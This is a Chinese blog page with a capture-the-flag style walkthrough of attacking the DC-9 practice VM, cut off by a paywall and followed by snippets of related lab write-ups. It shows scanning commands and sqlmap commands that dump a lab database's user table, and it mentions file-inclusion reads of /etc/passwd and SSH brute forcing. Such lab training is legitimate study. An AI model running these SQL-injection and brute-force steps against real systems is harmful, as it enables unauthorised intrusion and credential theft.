DC9靶机渗透测试

最新推荐文章于 2025-02-18 11:24:09 发布
原创 最新推荐文章于 2025-02-18 11:24:09 发布 · 556 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

文章目录


环境版本:

  • VMware pro 16
  • Kali 2021.1(虚拟机)
  • DC-9(虚拟机)

一、信息收集

1.主机发现
arp-scan -l

在这里插入图片描述

2.端口扫描
nmap -A -p- 192.168.1.111

在这里插入图片描述

开放了 22 ssh,但是状态为 filtered、80 端口 apache 服务

二、漏洞挖掘

1.访问靶机 web 服务

在 search 下表单输入内容提交发现跳转到 results.php 页面
在这里插入图片描述

在此抓包查看数据包内容
在这里插入图片描述

发现在 /results.php 进行了 POST 传参,参数为 search=1
尝试使用 sqlmap 进行爆数据

2.使用 SQLmap 进行信息收集

1)爆库

sqlmap -u http://192.168.1.111/results.php --data 'search=1' --dbs

在这里插入图片描述

发现有两个用户库

2)爆 Staff 数据库表

sqlmap -u http://192.168.1.111/results.php --data 'search=1' -D Staff --tables

在这里插入图片描述

3)直接爆 User 表内容

sqlmap -u http://192.168.1.111/results.php --data 'search=1' -D Staff -T Users --dump

在这里插入图片描述

得到 admin 账号密码 transorbital1

4)爆 users 库

sqlmap -u http://192.168.1.111/results.php --data
最低0.47元/天 解锁文章

200万优质内容无限畅学
DC-9靶机进行渗透测试
zll___的博客
03-24 1119
DC-9靶机进行渗透测试
VulnHub靶机 DC-9 靶机 详细渗透过程
网络空间安全学习
04-27 3551
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd
渗透测试DC-9靶机
Ciyaso的博客
08-24 839
一、扫描获取靶机ip arp-scan -l 192.168.203.148 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.148 开放了22、80端口 2.Wappaloyzer 访问主页 Web服务器:Apache 2.4.38 3.dirb dirb http://192.168.203.148 没有什么可以利用的 三、分析网站 Display 这里向我们显示了所有的用户信息 Search这里可以通过输入姓或名,可以查询相应信息 Manage这里
DC-9靶机渗透测试
weixin_58786230的博客
08-13 712
【代码】DC-9靶机渗透测试
DC9靶机渗透测试验收记录
01-10
### DC9靶机渗透测试验收标准与记录模板 对于DC9靶机渗透测试,验收标准通常围绕几个核心方面展开。这些方面包括但不限于漏洞发现的有效性、攻击路径验证以及安全建议的质量[^1]。 #### 漏洞发现有效性 有效的...
DC3靶机渗透测试练习
10-05
DC3靶机渗透测试练习 DC3靶机渗透测试练习是网络安全领域中的一个重要实践项目,旨在帮助安全测试人员和渗透测试人员提高自己的技能和经验。本文将详细介绍 DC3靶机渗透测试练习的各个阶段和步骤,以及每个阶段的...
DC-9靶机渗透测试全过程
最新发布
2401_88083440的博客
02-18 1872
DC-9靶机对我来说难度还是很大,整篇有很多是参考着各位师傅的wp进行的。这里我再消化一下接触到的知识:(1)端口的filtered过滤状态(2)knockd敲门进程(3)/proc/sched_debug 目录文件这里提权用的是已经编译好的执行程序,如果找不到编译文件怎么办?虽然说不一定只有这一条路,但需要学习的知识还有很多。DC靶机到这里就全结束了,花的时间有些长,也学到了不少东西,对于渗透测试的过程更清晰了些,这段也是对自己成长的见证了^-^
靶机渗透测试(IMF)
@小张小张的博客
09-29 2933
靶机渗透测试(IMF): Vulnhub靶机 IMF 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy) 目标:Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 靶机ip:192.168.10.29 2. nmap进行靶机端口服务扫描
靶机渗透测试(CyberSploit: 1)
@小张小张的博客
10-12 3075
靶机渗透测试(CyberSploit: 1): Vulnhub靶机 CyberSploit: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy–Intermediate) 目标:拿下三个flag.txt 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 终端命令: netdiscover -i eth0 -r 192.168.10.0(网关) 得到靶机ip:192.168.10.7
靶机渗透测试(Quaoar)
@小张小张的博客
09-10 2795
靶机渗透测试(Quaoar): Vulnhub靶机 Quaoar 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(初级) 目标:成功渗透进入靶机,找到三项flag,并拿到root权限。 渗透流程: 1.探测主机ip(此靶机开机时已经给出) 2.nmap进行靶机端口服务扫描 3.根据端口服务进行渗透 22-ssh端口:(msf攻击) 可以通过kali虚拟机msf工具进行ssh_login,但由于密码本的数据容量过小,无法爆破出登陆用户与密码
靶机渗透测试(covfefe)
小小猪的博客
06-05 1023
靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Intermediate) 目标:Covfefe is my Debian 9 based B2R VM, originally created as a CTF for SecTalks_BNE. It has three flags… flag进度:3/3 渗透流程: 1. 探测靶机ip地址 arp-scan -l .
靶机渗透测试(Sumo_Sun*)
@小张小张的博客
09-19 684
靶机渗透测试(Sumo_Sun*): Vulnhub靶机 Sumo_Sun* 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Beginner) 目标:成功渗透进入靶机,得到root shell ,提升至root权限! 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 得到靶机ip地址:192.168.10.22 2. nmap进行靶机端口服务扫描 nmap -sS -Pn -A -p- -n 靶
【CyberSecurityLearning 78】DC系列之DC-9渗透测试
_Co1a
05-12 1069
目录 DC-9靶机渗透测试 1、信息收集 1.1 扫描开放的端口 1.2 访问WEB站点 2. SQL注入 3、admin登录后台 4、尝试文件包含 4.1 利用 LFI 查看 /etc/knockd.conf 文件内容 4.2 hydra 爆破用户名密码 5. 登录SSH 6、提权 6.1 构造root权限用户 DC-9靶机渗透测试 实验环境: kali IP:192.168.3.196/24 DC-9的MAC地址:00:50:56:34:52:EA(IP为192.1.
VulnHub-dc-1靶机渗透测试
MzHeader的博客
11-02 613
0x00 前言 在开始之前我们需要先配置一下环境,因不知道DC-1靶机的IP,所有我们需要将靶机和kali放在同一个局域网里面,我这里是桥接。 0x01 探测目标 kali:192.168.199.241 首先,我们先来探测一下目标机器的IP,这里有很多种方法,着重讲一下其中2种方法。 (1)运行arp-scan识别目标的IP地址 使用arp-scan -l命令探测同一区域中存活主机。 (2)使...
靶机简单渗透测试
KKK_2178的博客
11-22 5640
1.下载靶机Metasploitable2-Linux,下载地址:Metasploitable download | SourceForge.net 2.在虚拟机中打开Kali-Linux和下载好的Metasploitable2-Linux,Metasploitable2-Linux的账号:msfadmin,密码:msfadmin. 3.靶机中输入指令ifconfig,得到靶机ip 4.返回Kali虚拟机操作 输入指令nmap xxxxx (xxxxx为你靶机的ip)查看靶机端口.
DC-9靶机渗透
weixin_45349299的博客
02-13 378
title: DC-9靶机渗透 date: 2023-1-8 16 :09 :36 tags: DC系列靶机 categories: 渗透从入门到入土 author:Abyssaler
靶机渗透测试(Chili)
@小张小张的博客
09-25 1854
靶机渗透测试(Chili): Vulnhub靶机 Chili 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy) 目标:Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 得到靶机ip地址为:192.168.10.88 2. nmap进行
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值